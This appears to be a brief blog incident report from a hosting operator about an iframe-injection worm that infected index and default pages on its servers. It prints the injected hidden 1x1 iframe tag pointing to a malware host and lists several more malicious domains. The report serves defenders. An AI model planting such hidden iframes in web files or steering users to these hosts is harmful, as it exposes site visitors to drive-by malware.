Under Attack! – iFrame Trojans
We witnessed a new IFRAME injection attack which seems to be doing the rounds over the last 24 hours.
We first noticed suspicious activity on our servers at 11:40 pm AEST time last night on the 6th April.
The attack injects iframe tags into HTML and dynamic files such as:
< iframe src=”http://superbetfair.cn/in.cgi?income44″ width=1 height=1 style=”visibility: hidden” >< /iframe >
Upon investigating some of our servers we found traffic coming from a number of hosts from all over the world, so it is fairly likely to be a worm.
The worm seems to target files named index, default, and welcome and main, so this includes files such as index.htm index.php
Additional hosts seen to be injected are:
- http://goooogleadsence.biz
- http://mmsreader.com
- http://google-ana1yticz.com
The good news is that if you’re using Firefox, it already detects these links as malware and clearly warns the user.
We are lucky in that it was a simple rollback for some of our hosts, however others may not be so lucky.
If you enjoyed this post, please consider to leave a comment or subscribe to the feed and get future articles delivered to your feed reader.
